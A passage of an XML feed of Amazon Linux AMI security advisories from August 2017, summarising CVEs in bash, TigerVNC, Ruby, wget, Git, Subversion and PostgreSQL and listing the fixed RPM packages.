</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9761" title="" id="CVE-2014-9761" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8776" title="" id="CVE-2015-8776" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8777" title="" id="CVE-2015-8777" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8778" title="" id="CVE-2015-8778" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8779" title="" id="CVE-2015-8779" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glibc-devel" version="2.17" release="196.172.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.17-196.172.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.17" release="196.172.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.17-196.172.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.17" release="196.172.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.17-196.172.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.17" release="196.172.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.17-196.172.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="196.172.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.17-196.172.amzn1.x86_64.rpm</filename></package><package name="glibc-utils" version="2.17" release="196.172.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.17-196.172.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="196.172.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.17-196.172.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.17" release="196.172.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.17-196.172.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.17" release="196.172.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.17-196.172.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="196.172.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.17-196.172.amzn1.i686.rpm</filename></package><package name="glibc-devel" version="2.17" release="196.172.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.17-196.172.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.17" release="196.172.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.17-196.172.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.17" release="196.172.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.17-196.172.amzn1.i686.rpm</filename></package><package name="glibc" version="2.17" release="196.172.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.17-196.172.amzn1.i686.rpm</filename></package><package name="nscd" version="2.17" release="196.172.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.17-196.172.amzn1.i686.rpm</filename></package><package name="glibc-static" version="2.17" release="196.172.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.17-196.172.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="196.172.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.17-196.172.amzn1.i686.rpm</filename></package><package name="glibc-common" version="2.17" release="196.172.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.17-196.172.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-878</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-878: medium priority package update for bash</title><issued date="2017-08-31 15:53:00" /><updated date="2017-08-31 23:02:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-9401:
A denial of service flaw was found in the way bash handled popd commands. A poorly written shell script could cause bash to crash resulting in a local denial of service limited to a specific bash session.
1396383:
CVE-2016-9401 bash: popd controlled free
CVE-2016-7543:
An arbitrary command injection flaw was found in the way bash processed the SHELLOPTS and PS4 environment variables. A local, authenticated attacker could use this flaw to exploit poorly written setuid programs to elevate their privileges under certain circumstances.
1379630:
CVE-2016-7543 bash: Specially crafted SHELLOPTS+PS4 variables allows command substitution
CVE-2016-0634:
An arbitrary command injection flaw was found in the way bash processed the hostname value. A malicious DHCP server could use this flaw to execute arbitrary commands on the DHCP client machines running bash under specific circumstances.
1377613:
CVE-2016-0634 bash: Arbitrary code execution via malicious hostname
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0634" title="" id="CVE-2016-0634" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7543" title="" id="CVE-2016-7543" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9401" title="" id="CVE-2016-9401" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bash-debuginfo" version="4.2.46" release="28.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/bash-debuginfo-4.2.46-28.37.amzn1.x86_64.rpm</filename></package><package name="bash" version="4.2.46" release="28.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/bash-4.2.46-28.37.amzn1.x86_64.rpm</filename></package><package name="bash-doc" version="4.2.46" release="28.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/bash-doc-4.2.46-28.37.amzn1.x86_64.rpm</filename></package><package name="bash-doc" version="4.2.46" release="28.37.amzn1" epoch="0" arch="i686"><filename>Packages/bash-doc-4.2.46-28.37.amzn1.i686.rpm</filename></package><package name="bash" version="4.2.46" release="28.37.amzn1" epoch="0" arch="i686"><filename>Packages/bash-4.2.46-28.37.amzn1.i686.rpm</filename></package><package name="bash-debuginfo" version="4.2.46" release="28.37.amzn1" epoch="0" arch="i686"><filename>Packages/bash-debuginfo-4.2.46-28.37.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-879</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-879: medium priority package update for tigervnc</title><issued date="2017-08-31 15:56:00" /><updated date="2017-08-31 23:05:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7396:
A memory leak flaw was found in the way TigerVNC handled client connections. A remote unauthenticated attacker could repeatedly send connection requests to the Xvnc server, causing it to consume large amounts of memory resources over time, and ultimately leading to a denial of service due to memory exhaustion.
1438703:
CVE-2017-7396 tigervnc: SecurityServer and ClientServer memory leaks
CVE-2017-7395:
An integer overflow flaw was found in the way TigerVNC handled ClientCutText messages. A remote, authenticated attacker could use this flaw to make Xvnc crash by sending specially crafted ClientCutText messages, resulting in denial of service.
1438701:
CVE-2017-7395 tigervnc: Integer overflow in SMsgReader::readClientCutText
CVE-2017-7394:
A missing input sanitization flaw was found in the way TigerVNC handled credentials. A remote unauthenticated attacker could use this flaw to make Xvnc crash by sending specially crafted usernames, resulting in denial of service.
1438700:
CVE-2017-7394 tigervnc: Server crash via long usernames
CVE-2017-7393:
A double free flaw was found in the way TigerVNC handled ClientFence messages. A remote, authenticated attacker could use this flaw to make Xvnc crash by sending specially crafted ClientFence messages, resulting in denial of service.
1438697:
CVE-2017-7393 tigervnc: Double free via crafted fences
CVE-2017-7392:
A memory leak flaw was found in the way TigerVNC handled termination of VeNCrypt connections. A remote unauthenticated attacker could repeatedly send connection requests to the Xvnc server, causing it to consume large amounts of memory resources over time, and ultimately leading to a denial of service due to memory exhaustion.
1438694:
CVE-2017-7392 tigervnc: SSecurityVeNCrypt memory leak
CVE-2017-5581:
A buffer overflow flaw, leading to memory corruption, was found in TigerVNC viewer. A remote malicious VNC server could use this flaw to crash the client vncviewer process resulting in denial of service.
1415712:
CVE-2017-5581 tigervnc: Buffer overflow in ModifiablePixelBuffer::fillRect
CVE-2016-10207:
A denial of service flaw was found in the TigerVNC&#039;s Xvnc server. A remote unauthenticated attacker could use this flaw to make Xvnc crash by terminating the TLS handshake process early.
1418761:
CVE-2016-10207 tigervnc: VNC server can crash when TLS handshake terminates early
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10207" title="" id="CVE-2016-10207" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5581" title="" id="CVE-2017-5581" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7392" title="" id="CVE-2017-7392" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7393" title="" id="CVE-2017-7393" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7394" title="" id="CVE-2017-7394" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7395" title="" id="CVE-2017-7395" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7396" title="" id="CVE-2017-7396" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tigervnc" version="1.8.0" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-1.8.0-1.32.amzn1.x86_64.rpm</filename></package><package name="tigervnc-server-module" version="1.8.0" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-server-module-1.8.0-1.32.amzn1.x86_64.rpm</filename></package><package name="tigervnc-server" version="1.8.0" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-server-1.8.0-1.32.amzn1.x86_64.rpm</filename></package><package name="tigervnc-debuginfo" version="1.8.0" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-debuginfo-1.8.0-1.32.amzn1.x86_64.rpm</filename></package><package name="tigervnc-debuginfo" version="1.8.0" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-debuginfo-1.8.0-1.32.amzn1.i686.rpm</filename></package><package name="tigervnc-server-module" version="1.8.0" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-server-module-1.8.0-1.32.amzn1.i686.rpm</filename></package><package name="tigervnc-server" version="1.8.0" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-server-1.8.0-1.32.amzn1.i686.rpm</filename></package><package name="tigervnc" version="1.8.0" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-1.8.0-1.32.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-880</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-880: medium priority package update for ruby23</title><issued date="2017-08-31 15:57:00" /><updated date="2017-08-31 23:06:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-7798:
The openssl gem for Ruby uses the same initialization vector (IV) in GCM Mode (aes-*-gcm) when the IV is set before the key, which makes it easier for context-dependent attackers to bypass the encryption protection mechanism.
1381526:
CVE-2016-7798 ruby: IV Reuse in GCM Mode
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7798" title="" id="CVE-2016-7798" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby23" version="2.3.4" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby23-2.3.4-1.15.amzn1.x86_64.rpm</filename></package><package name="rubygem23-io-console" version="0.4.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem23-io-console-0.4.5-1.15.amzn1.x86_64.rpm</filename></package><package name="ruby23-doc" version="2.3.4" release="1.15.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby23-doc-2.3.4-1.15.amzn1.noarch.rpm</filename></package><package name="ruby23-devel" version="2.3.4" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby23-devel-2.3.4-1.15.amzn1.x86_64.rpm</filename></package><package name="rubygems23-devel" version="2.5.2" release="1.15.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems23-devel-2.5.2-1.15.amzn1.noarch.rpm</filename></package><package name="rubygem23-bigdecimal" version="1.2.8" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem23-bigdecimal-1.2.8-1.15.amzn1.x86_64.rpm</filename></package><package name="ruby23-debuginfo" version="2.3.4" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby23-debuginfo-2.3.4-1.15.amzn1.x86_64.rpm</filename></package><package name="rubygem23-did_you_mean" version="1.0.0" release="1.15.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem23-did_you_mean-1.0.0-1.15.amzn1.noarch.rpm</filename></package><package name="ruby23-irb" version="2.3.4" release="1.15.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby23-irb-2.3.4-1.15.amzn1.noarch.rpm</filename></package><package name="ruby23-libs" version="2.3.4" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby23-libs-2.3.4-1.15.amzn1.x86_64.rpm</filename></package><package name="rubygem23-psych" version="2.1.0" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem23-psych-2.1.0-1.15.amzn1.x86_64.rpm</filename></package><package name="rubygems23" version="2.5.2" release="1.15.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems23-2.5.2-1.15.amzn1.noarch.rpm</filename></package><package name="ruby23-debuginfo" version="2.3.4" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/ruby23-debuginfo-2.3.4-1.15.amzn1.i686.rpm</filename></package><package name="ruby23-devel" version="2.3.4" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/ruby23-devel-2.3.4-1.15.amzn1.i686.rpm</filename></package><package name="rubygem23-psych" version="2.1.0" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem23-psych-2.1.0-1.15.amzn1.i686.rpm</filename></package><package name="rubygem23-io-console" version="0.4.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem23-io-console-0.4.5-1.15.amzn1.i686.rpm</filename></package><package name="ruby23" version="2.3.4" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/ruby23-2.3.4-1.15.amzn1.i686.rpm</filename></package><package name="rubygem23-bigdecimal" version="1.2.8" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem23-bigdecimal-1.2.8-1.15.amzn1.i686.rpm</filename></package><package name="ruby23-libs" version="2.3.4" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/ruby23-libs-2.3.4-1.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-881</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-881: low priority package update for wget</title><issued date="2017-08-31 15:58:00" /><updated date="2017-08-31 23:07:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-6508:
A CRLF injection flaw was found in the way wget handled URLs. A remote attacker could use this flaw to inject arbitrary HTTP headers in requests, via CRLF sequences in the host sub-component of a URL, by tricking a user running wget into processing crafted URLs.
1429984:
CVE-2017-6508 wget: CRLF injection in the url_parse function in url.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6508" title="" id="CVE-2017-6508" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="wget" version="1.18" release="3.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/wget-1.18-3.27.amzn1.x86_64.rpm</filename></package><package name="wget-debuginfo" version="1.18" release="3.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/wget-debuginfo-1.18-3.27.amzn1.x86_64.rpm</filename></package><package name="wget-debuginfo" version="1.18" release="3.27.amzn1" epoch="0" arch="i686"><filename>Packages/wget-debuginfo-1.18-3.27.amzn1.i686.rpm</filename></package><package name="wget" version="1.18" release="3.27.amzn1" epoch="0" arch="i686"><filename>Packages/wget-1.18-3.27.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-882</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-882: important priority package update for git</title><issued date="2017-08-31 16:00:00" /><updated date="2017-08-31 23:09:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-1000117:
A shell command injection flaw related to the handling of &quot;ssh&quot; URLs has been discovered in Git. An attacker could use this flaw to execute shell commands with the privileges of the user running the Git client, for example, when performing a &quot;clone&quot; action on a malicious repository or a legitimate repository containing a malicious commit.
1480386:
CVE-2017-1000117 git: Command injection via malicious ssh URLs
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000117" title="" id="CVE-2017-1000117" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="git-daemon" version="2.13.5" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-daemon-2.13.5-1.53.amzn1.x86_64.rpm</filename></package><package name="git-email" version="2.13.5" release="1.53.amzn1" epoch="0" arch="noarch"><filename>Packages/git-email-2.13.5-1.53.amzn1.noarch.rpm</filename></package><package name="git" version="2.13.5" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-2.13.5-1.53.amzn1.x86_64.rpm</filename></package><package name="git-debuginfo" version="2.13.5" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-debuginfo-2.13.5-1.53.amzn1.x86_64.rpm</filename></package><package name="git-bzr" version="2.13.5" release="1.53.amzn1" epoch="0" arch="noarch"><filename>Packages/git-bzr-2.13.5-1.53.amzn1.noarch.rpm</filename></package><package name="git-p4" version="2.13.5" release="1.53.amzn1" epoch="0" arch="noarch"><filename>Packages/git-p4-2.13.5-1.53.amzn1.noarch.rpm</filename></package><package name="git-cvs" version="2.13.5" release="1.53.amzn1" epoch="0" arch="noarch"><filename>Packages/git-cvs-2.13.5-1.53.amzn1.noarch.rpm</filename></package><package name="emacs-git-el" version="2.13.5" release="1.53.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-el-2.13.5-1.53.amzn1.noarch.rpm</filename></package><package name="git-svn" version="2.13.5" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-svn-2.13.5-1.53.amzn1.x86_64.rpm</filename></package><package name="git-all" version="2.13.5" release="1.53.amzn1" epoch="0" arch="noarch"><filename>Packages/git-all-2.13.5-1.53.amzn1.noarch.rpm</filename></package><package name="git-hg" version="2.13.5" release="1.53.amzn1" epoch="0" arch="noarch"><filename>Packages/git-hg-2.13.5-1.53.amzn1.noarch.rpm</filename></package><package name="perl-Git-SVN" version="2.13.5" release="1.53.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-SVN-2.13.5-1.53.amzn1.noarch.rpm</filename></package><package name="gitweb" version="2.13.5" release="1.53.amzn1" epoch="0" arch="noarch"><filename>Packages/gitweb-2.13.5-1.53.amzn1.noarch.rpm</filename></package><package name="emacs-git" version="2.13.5" release="1.53.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-2.13.5-1.53.amzn1.noarch.rpm</filename></package><package name="perl-Git" version="2.13.5" release="1.53.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-2.13.5-1.53.amzn1.noarch.rpm</filename></package><package name="git" version="2.13.5" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/git-2.13.5-1.53.amzn1.i686.rpm</filename></package><package name="git-daemon" version="2.13.5" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/git-daemon-2.13.5-1.53.amzn1.i686.rpm</filename></package><package name="git-debuginfo" version="2.13.5" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/git-debuginfo-2.13.5-1.53.amzn1.i686.rpm</filename></package><package name="git-svn" version="2.13.5" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/git-svn-2.13.5-1.53.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-883</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-883: important priority package update for subversion mod_dav_svn</title><issued date="2017-08-31 16:11:00" /><updated date="2017-08-31 23:10:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-9800:
A shell command injection flaw related to the handling of &quot;svn+ssh&quot; URLs has been discovered in Subversion. An attacker could use this flaw to execute shell commands with the privileges of the user running the Subversion client, for example when performing a &quot;checkout&quot; or &quot;update&quot; action on a malicious repository, or a legitimate repository containing a malicious commit.
1479686:
CVE-2017-9800 subversion: Command injection through clients via malicious svn+ssh URLs
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9800" title="" id="CVE-2017-9800" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod_dav_svn" version="1.9.7" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_dav_svn-1.9.7-1.54.amzn1.x86_64.rpm</filename></package><package name="mod_dav_svn-debuginfo" version="1.9.7" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_dav_svn-debuginfo-1.9.7-1.54.amzn1.x86_64.rpm</filename></package><package name="mod_dav_svn" version="1.9.7" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/mod_dav_svn-1.9.7-1.54.amzn1.i686.rpm</filename></package><package name="mod_dav_svn-debuginfo" version="1.9.7" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/mod_dav_svn-debuginfo-1.9.7-1.54.amzn1.i686.rpm</filename></package><package name="subversion-tools" version="1.9.7" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-tools-1.9.7-1.58.amzn1.x86_64.rpm</filename></package><package name="subversion" version="1.9.7" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-1.9.7-1.58.amzn1.x86_64.rpm</filename></package><package name="subversion-ruby" version="1.9.7" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-ruby-1.9.7-1.58.amzn1.x86_64.rpm</filename></package><package name="subversion-python27" version="1.9.7" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-python27-1.9.7-1.58.amzn1.x86_64.rpm</filename></package><package name="mod24_dav_svn" version="1.9.7" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_dav_svn-1.9.7-1.58.amzn1.x86_64.rpm</filename></package><package name="subversion-perl" version="1.9.7" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-perl-1.9.7-1.58.amzn1.x86_64.rpm</filename></package><package name="subversion-libs" version="1.9.7" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-libs-1.9.7-1.58.amzn1.x86_64.rpm</filename></package><package name="subversion-javahl" version="1.9.7" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-javahl-1.9.7-1.58.amzn1.x86_64.rpm</filename></package><package name="subversion-python26" version="1.9.7" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-python26-1.9.7-1.58.amzn1.x86_64.rpm</filename></package><package name="subversion-devel" version="1.9.7" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-devel-1.9.7-1.58.amzn1.x86_64.rpm</filename></package><package name="subversion-debuginfo" version="1.9.7" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-debuginfo-1.9.7-1.58.amzn1.x86_64.rpm</filename></package><package name="subversion-tools" version="1.9.7" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-tools-1.9.7-1.58.amzn1.i686.rpm</filename></package><package name="subversion-libs" version="1.9.7" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-libs-1.9.7-1.58.amzn1.i686.rpm</filename></package><package name="subversion-devel" version="1.9.7" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-devel-1.9.7-1.58.amzn1.i686.rpm</filename></package><package name="subversion-python27" version="1.9.7" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-python27-1.9.7-1.58.amzn1.i686.rpm</filename></package><package name="subversion-perl" version="1.9.7" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-perl-1.9.7-1.58.amzn1.i686.rpm</filename></package><package name="subversion-debuginfo" version="1.9.7" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-debuginfo-1.9.7-1.58.amzn1.i686.rpm</filename></package><package name="subversion" version="1.9.7" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-1.9.7-1.58.amzn1.i686.rpm</filename></package><package name="subversion-javahl" version="1.9.7" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-javahl-1.9.7-1.58.amzn1.i686.rpm</filename></package><package name="mod24_dav_svn" version="1.9.7" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_dav_svn-1.9.7-1.58.amzn1.i686.rpm</filename></package><package name="subversion-ruby" version="1.9.7" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-ruby-1.9.7-1.58.amzn1.i686.rpm</filename></package><package name="subversion-python26" version="1.9.7" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-python26-1.9.7-1.58.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-884</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-884: medium priority package update for postgresql93 postgresql92</title><issued date="2017-08-31 16:20:00" /><updated date="2017-08-31 23:11:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7547:
An authorization flaw was found in the way PostgreSQL handled access to the pg_user_mappings view on foreign servers. A remote authenticated attacker could potentially use this flaw to retrieve passwords from the user mappings defined by the foreign server owners without actually having the privileges to do so.
1477185:
CVE-2017-7547 postgresql: pg_user_mappings view discloses passwords to users lacking server privileges
CVE-2017-7546:
It was found that authenticating to a PostgreSQL database account with an empty password was possible despite libpq&#039;s refusal to send an empty password. A remote attacker could potentially use this flaw to gain access to database accounts with empty passwords.
1477184:
CVE-2017-7546 postgresql: Empty password accepted in some authentication methods
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7546" title="" id="CVE-2017-7546" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7547" title="" id="CVE-2017-7547" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql93-plpython26" version="9.3.18" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython26-9.3.18-1.64.amzn1.x86_64.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.18" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-pltcl-9.3.18-1.64.amzn1.x86_64.rpm</filename></package><package name="postgresql93-devel" version="9.3.18" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-devel-9.3.18-1.64.amzn1.x86_64.rpm</filename></package><package name="postgresql93-libs" version="9.3.18" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-libs-9.3.18-1.64.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython27" version="9.3.18" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython27-9.3.18-1.64.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plperl" version="9.3.18" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plperl-9.3.18-1.64.amzn1.x86_64.rpm</filename></package><package name="postgresql93-contrib" version="9.3.18" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-contrib-9.3.18-1.64.amzn1.x86_64.rpm</filename></package><package name="postgresql93" version="9.3.18" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-9.3.18-1.64.amzn1.x86_64.rpm</filename></package><package name="postgresql93-server" version="9.3.18" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-server-9.3.18-1.64.amzn1.x86_64.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.18" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-debuginfo-9.3.18-1.64.amzn1.x86_64.rpm</filename></package><package name="postgresql93-test" version="9.3.18" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-test-9.3.18-1.64.amzn1.x86_64.rpm</filename></package><package name="postgresql93-docs" version="9.3.18" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-docs-9.3.18-1.64.amzn1.x86_64.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.18" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-debuginfo-9.3.18-1.64.amzn1.i686.rpm</filename></package><package name="postgresql93-test" version="9.3.18" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-test-9.3.18-1.64.amzn1.i686.rpm</filename></package><package name="postgresql93-plpython27" version="9.3.18" 